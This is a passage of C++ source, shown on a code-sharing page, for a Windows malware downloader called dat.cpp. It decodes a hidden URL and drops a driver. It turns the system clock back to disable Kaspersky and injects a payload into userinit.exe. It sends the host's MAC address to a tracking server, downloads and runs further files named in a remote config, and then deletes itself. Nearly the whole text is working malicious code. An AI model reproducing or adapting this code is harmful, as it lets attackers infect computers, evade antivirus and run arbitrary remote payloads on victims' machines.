📄 dat.cpp
字号:
}
}
else
{
GetTempPath(MAX_PATH, szTempDir);
GetTempFileName( szTempDir, "sv", iProcessNameNumber, szTempExe);
// 循环10次
for ( DWORD index = 0; index < 5; index++)
{
hRes = kkkkkk( NULL, lpszUrl, szTempExe, 0, NULL);
if ( hRes == S_OK )
{
break;
}
Sleep(1000);
}
if ( index == 5)
{
return;
}
}
if ( !bIsIni )
{
RunProcess(szTempExe, TRUE);
return;
}
}
//
// 向向服务器发送本地主机的信息,包括:物理地址、杀软名称、系统版本号、ie版本号
//
BOOL RePortState(char *szDomain, char *Version, char *szMac)
{
XXXInternetOpen tempInternetOpen;
XXXInternetOpenUrl tempInternetOpenUrl;
XXXInternetCloseHandle tempInternetCloseHandle;
tempInternetOpen = (XXXInternetOpen)GetProcAddress( LoadLibrary("wininet.dll"), "InternetOpenA");
tempInternetOpenUrl = (XXXInternetOpenUrl)GetProcAddress( LoadLibrary("wininet.dll"), "InternetOpenUrlA");
tempInternetCloseHandle = (XXXInternetCloseHandle)GetProcAddress( LoadLibrary("wininet.dll"), "InternetCloseHandle");
HINTERNET hropen=NULL;
HINTERNET hropenurl=NULL;
hropen=tempInternetOpen("GOOGLE",
PRE_CONFIG_INTERNET_ACCESS,
NULL,
INTERNET_INVALID_PORT_NUMBER,
0);
if(hropen==NULL)
{
return FALSE;
}
char szSendBuf[MAX_PATH] = {0};
char szFirstPartBuf[] = "clcount/count.asp?mac=";
char szSendPartBuf[] = "&ver=";
// 构造数据包
strcpy(szSendBuf, szDomain);
strcat(szSendBuf, szFirstPartBuf);
strcat(szSendBuf, szMac);
strcat(szSendBuf, szSendPartBuf);
strcat(szSendBuf, Version);
hropenurl = tempInternetOpenUrl(hropen,
szSendBuf,
NULL,
0,
INTERNET_FLAG_RELOAD,
0);
if(hropenurl==NULL)
{
if(hropen)
{
tempInternetCloseHandle(hropen);
hropen=NULL;
}
return FALSE;
}
return TRUE;
}
//
// 查找是否存在指定的标记
//
BOOL FindMarks(char *szIniFilePath, char *szInMark)
{
int iRenturnValue = 0;
char szGettedStr[10] = {0};
int icount = 0;
GetPrivateProfileString("localfile", "count","0",szGettedStr,sizeof(szGettedStr), szIniFilePath);
if (szGettedStr[0] != 0x00)
{
icount = atoi(szGettedStr);
}
// 无count值,则说明没有标记
if (icount <= 0)
{
return FALSE;
}
char szNumber[5] = {0};
char szMarkStr[10] = {0};
strcpy(szMarkStr, "biaoji");
char szTotalStr[10] = {0};
// 循环查询是否存在该值
for (int j = 1; j < icount + 1; j++)
{
// 清空接收数据的缓冲区
memset(szGettedStr, 0, 10);
memset(szNumber, 0, 5);
itoa(j, szNumber, 10);
memset(szTotalStr, 0 , 10);
strcpy(szTotalStr, szMarkStr);
strcat(szTotalStr, szNumber);
GetPrivateProfileString("localfile", szTotalStr,"0",szGettedStr,sizeof(szGettedStr), szIniFilePath);
if (strcmp(szGettedStr, szInMark) == 0)
{
return TRUE;
}
}
return FALSE;
}
void DelSelf()
{
char strFileContent[256]={0};
char MySelf[256]={0};
GetModuleFileName(0,MySelf,256);
strcpy(strFileContent,":");
strcat(strFileContent,"delloop\r\n");
strcat(strFileContent,"del ");
strcat(strFileContent,"\"");
strcat(strFileContent,MySelf); //
strcat(strFileContent,"\"\r\n");
strcat(strFileContent,"if exist \"");
strcat(strFileContent,MySelf); //
strcat(strFileContent,"\" goto delloop\r\n");//
strcat(strFileContent,"del %0"); //
TCHAR strSysDir[256]={0};
GetSystemDirectory(strSysDir,MAX_PATH);
strcat(strSysDir,"\\del09.bat");//
HFILE hFile=_lcreat(strSysDir,0);//
_lwrite(hFile,strFileContent,strlen(strFileContent));//
_lclose(hFile); //
// ShellExecute(0,0,strSysDir,0,0,SW_HIDE);
RunProcess(strSysDir, FALSE);
}
DWORD GetProcessIdFromName1(LPCTSTR name)
{
PROCESSENTRY32 pe;
DWORD id = 0;
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
pe.dwSize = sizeof(PROCESSENTRY32);
if( !Process32First(hSnapshot,&pe) )
return 0;
while(1)
{
pe.dwSize = sizeof(PROCESSENTRY32);
if( Process32Next(hSnapshot,&pe)==FALSE )
break;
if(strcmp(pe.szExeFile,name) == 0)
{
id = pe.th32ProcessID;
break;
}
};
CloseHandle(hSnapshot);
return id;
}
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
TCHAR szCurrentModule[MAX_PATH];
TCHAR szSysPath[MAX_PATH];
DWORD dwFileSize, dwVirusDataSize, dwURLLength;
LPVOID lpFileData, lpVirusData, lpURLData;
GetModuleFileName(NULL, szCurrentModule, MAX_PATH);
SetFileAttributes(szCurrentModule, FILE_ATTRIBUTE_NORMAL);
// 重启后删除文件
MoveFileEx(szCurrentModule, NULL, MOVEFILE_DELAY_UNTIL_REBOOT);
// 映射文件到内存
lpFileData = MapFile(szCurrentModule, &dwFileSize, TRUE);
if ( lpFileData == NULL )
{
return -1;
}
// 获取第二个文件在内存中的地址
lpVirusData = GetOverlayOffset(lpFileData, dwFileSize, &dwVirusDataSize);
if ( lpVirusData == NULL || dwVirusDataSize == 0 )
{
UnmapFile(lpFileData);
return -2;
}
// 获取第二个文件中url在内存中的地址
lpURLData = GetOverlayOffset(lpVirusData, dwVirusDataSize, &dwURLLength);
if ( lpURLData == NULL || dwURLLength == 0 )
{
UnmapFile(lpFileData);
return -3;
}
//////////////////////////////////////////////////////////////////////////
// 提取出url和版本号,用于下载和发送本机的相关信息
//////////////////////////////////////////////////////////////////////////
char szDownurl[MAX_PATH] = {0};
char szVersionData[12] = {0};
char *szCurVersion = (char *)(lpURLData) - 10; // 指向当前的版本号
char *szUrl = (char*)lpURLData; // 指向文件尾部,保存的是要下载的url
// 得到当前版本号
for(int m = 0; m < 10; m++)
{
szVersionData[m] = szCurVersion[m];
}
// 得出url
for ( DWORD index = 0; index < dwURLLength - 4; index++)
{
szDownurl[index] = szUrl[index] ^ 0x9a;
if ( szDownurl[index] == 0 )
{
break;
}
}
//MessageBox(NULL, szDownurl, szVersionData, NULL);
//////////////////////////////////////////////////////////////////////////
// 提升权限
RaiseToDebugP();
GetTempPath(MAX_PATH, szSysPath);
PathAppend(szSysPath, "DogKiller.sys");
// 驱动安装
// 先查看是否存在卡巴,存在则修改系统时间,使其失效
int pidcheck1=GetProcessIdFromName1("avp.exe");
int pidcheck2=GetProcessIdFromName1("AVP.EXE");
// 先获取系统正确的时间
SYSTEMTIME RealTime;
GetSystemTime(&RealTime);
if(pidcheck1!=0||pidcheck2!=0)
{
SYSTEMTIME FakeTime;
::GetSystemTime(&FakeTime);
FakeTime.wYear= 1999;
FakeTime.wMonth = 11;
SetSystemTime(&FakeTime);
Sleep(1000);
}
xxxx(szSysPath);
SetSystemTime(&RealTime);
OutputDebugString("aaaaa");
HANDLE hDevice = CreateFile(_T("\\\\.\\PciFtDisk"), GENERIC_READ, 0, // 独占打开
NULL, OPEN_EXISTING, 0, NULL);
if ( hDevice != INVALID_HANDLE_VALUE )
{
OutputDebugString("xxxxx");
#if 0
DWORD dwUrlOffset = 0x29a557;
char szBuffer[512] = {0};
szBuffer[0] = 'q';
szBuffer[1] = 't';
lpVirusData = szBuffer;
dwVirusDataSize = 512;
#else
DWORD dwUrlOffset = (DWORD)lpURLData - (DWORD)lpVirusData;
#endif
DWORD dwBytes;
char szUrlOffset[20];
itoa( dwUrlOffset, szUrlOffset, 20);
OutputDebugString(szUrlOffset);
if ( DeviceIoControl(hDevice, IOCTL_PASS_SNDISK, &dwUrlOffset, 4, NULL, 0, &dwBytes, NULL) )
{
OutputDebugString("yyyy");
// 第二个文件数据写入系统userinit.exe
if ( DeviceIoControl( hDevice, IOCTL_INJECT_FILE, lpVirusData, dwVirusDataSize, NULL, 0, &dwBytes, NULL) )
{
// ::MessageBox(NULL, "xxxxxx", "x", 0);
}
}
}
UnmapFile(lpFileData);
CloseHandle(hDevice);
//////////////////////////////////////////////////////////////////////////
// 执行下载者的全部功能
//////////////////////////////////////////////////////////////////////////
// 获取mac地址
char macstr[13]="000000000000";
typedef DWORD(CALLBACK * ADAPINFO)(PIP_ADAPTER_INFO, PULONG);
ADAPINFO getadapinfo;
HINSTANCE hmodule=NULL;
hmodule=LoadLibrary("iphlpapi.dll");
if(hmodule)
{
getadapinfo=(ADAPINFO)GetProcAddress(hmodule,"GetAdaptersInfo");
IP_ADAPTER_INFO Info;
ULONG ulSize=sizeof(Info);
getadapinfo(&Info, &ulSize);
DWORD dwError = 0;
dwError = GetLastError();
if (&Info)
{
itoa(Info.Address[0], &macstr[0], 16);
itoa(Info.Address[1], &macstr[2], 16);
itoa(Info.Address[2], &macstr[4], 16);
itoa(Info.Address[3], &macstr[6], 16);
itoa(Info.Address[4], &macstr[8], 16);
itoa(Info.Address[5], &macstr[10], 16);
}
// 处理0结尾的情况
for (int m = 0; m < 12; m++)
{
if (macstr[m] == 0x00)
{
macstr[m] = 0x30;
}
}
FreeLibrary(hmodule);
}
// 取域名地址
char szLocalDomain[MAX_PATH] = {0};
strcpy(szLocalDomain, szDownurl);
memset(szLocalDomain + strlen(szDownurl) - 8, 0, MAX_PATH/2 );
// 向服务器发送安装数据
RePortState( szLocalDomain, szVersionData, macstr);
// 下载down.txt文件
DownloadFile(szDownurl, 921);
// 解析down.txt文件
char szSysDir[MAX_PATH];
GetSystemDirectory(szSysDir,sizeof(szSysDir));
// 本地下载者的配置文件
char szLocalIniPath[MAX_PATH] = {0};
strcpy(szLocalIniPath, szSysDir);
strcat(szLocalIniPath, "\\systemInfomations.ini");
// 判断文件是否存在,不存在则重新下载
DWORD dwLocalFileExist = 0;
char szLocalVersion[20] = {0};
// 返回1,则不存在该文件
dwLocalFileExist = GetPrivateProfileString("vension","org","0",szLocalVersion,sizeof(szLocalVersion), szLocalIniPath);
if (dwLocalFileExist == 1)
{
// 版本号写入ini配置文件
WritePrivateProfileString("curversion", "ver", szVersionData, szLocalIniPath);
}
// 下载的远程文件
char szDownPath[MAX_PATH] = {0};
strcpy(szDownPath, szSysDir);
strcat(szDownPath, "\\down.txt");
DWORD dwReturnValue = 0;
// 取下载文件要求的的版本号和升级地址
char szNewVersion[20] = {0};
char szUpdatePath[100] = {0};
dwReturnValue = GetPrivateProfileString("update","ver","0",szNewVersion,sizeof(szNewVersion), szDownPath);
dwReturnValue = GetPrivateProfileString("update","url","0",szUpdatePath,sizeof(szUpdatePath), szDownPath);
// 如果本地配置文件不存在,或者版本号不同,则升级下载者
if ( (strcmp(szNewVersion, szVersionData) != 0) )
{
DownloadFile(szUpdatePath, 890);
}
// 查看是否需要执行下载功能
int iNeedDown = 0;
char szNeedDownBuf[5] = {0};
GetPrivateProfileString("file","isfile","0",szNeedDownBuf,sizeof(szNeedDownBuf), szDownPath);
iNeedDown = atoi(szNeedDownBuf);
// 不需要下载
if (iNeedDown == 0)
{
return 0;
}
// 执行down.txt中指定下载执行的文件
int iDownCount = 0;
char szDownTimeBuf[5] = {0};
GetPrivateProfileString("file","count","0",szDownTimeBuf,sizeof(szDownTimeBuf), szDownPath);
iDownCount = atoi(szDownTimeBuf);
char szTxtDownUrl[10] = {0};
char szTxtDownMark[10] = {0};
strcpy(szTxtDownUrl, "url");
strcpy(szTxtDownMark, "biaoji");
char szCountBuf[5] = {0};
char szGetBuf[20] = {0}; // 保存用于查询的标记
char szGetUrl[20] = {0}; // 保存用于查询的url
// 保存读取出的值
char szDownAndExecUrl[MAX_PATH] = {0};
char szFileMark[20] = {0};
// 用于计算本机下载的个数
int isys = 0;
char szIsysBuf[5] = {0};
for(int i = 1; i < iDownCount + 1; i++)
{
memset(szGetBuf, 0, 20);
strcpy(szGetBuf, szTxtDownMark);
itoa(i, szCountBuf, 10);
strcat(szGetBuf, szCountBuf);
memset(szDownAndExecUrl, 0, MAX_PATH);
memset(szFileMark, 0, 20);
// 先读标记,看是否存在,存在就跳过,否则就下载执行
GetPrivateProfileString("file", szGetBuf, "0", szFileMark, sizeof(szFileMark), szDownPath);
// 标记不存在,则获取url,并下载执行
if (!FindMarks(szLocalIniPath, szFileMark))
{
memset(szGetUrl, 0, 20);
strcpy(szGetUrl, szTxtDownUrl);
strcat(szGetUrl, szCountBuf);
GetPrivateProfileString("file", szGetUrl, "0", szDownAndExecUrl, sizeof(szDownAndExecUrl), szDownPath);
DownloadFile(szDownAndExecUrl, i);
// 写入标记
WritePrivateProfileString("localfile", szGetBuf, szFileMark, szLocalIniPath);
// 修改systeminfomations.ini中的文件个数,个数+1
GetPrivateProfileString("localfile", "count", "0", szIsysBuf, sizeof(szIsysBuf), szLocalIniPath);
isys = atoi(szIsysBuf);
isys = isys + 1;
memset(szIsysBuf, 0 , 5);
itoa(isys, szIsysBuf, 10);
WritePrivateProfileString("localfile", "count", szIsysBuf, szLocalIniPath);
}
Sleep(500);
}
//////////////////////////////////////////////////////////////////////////
K32DeleteSelfFile();
DelSelf();
return 0;
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -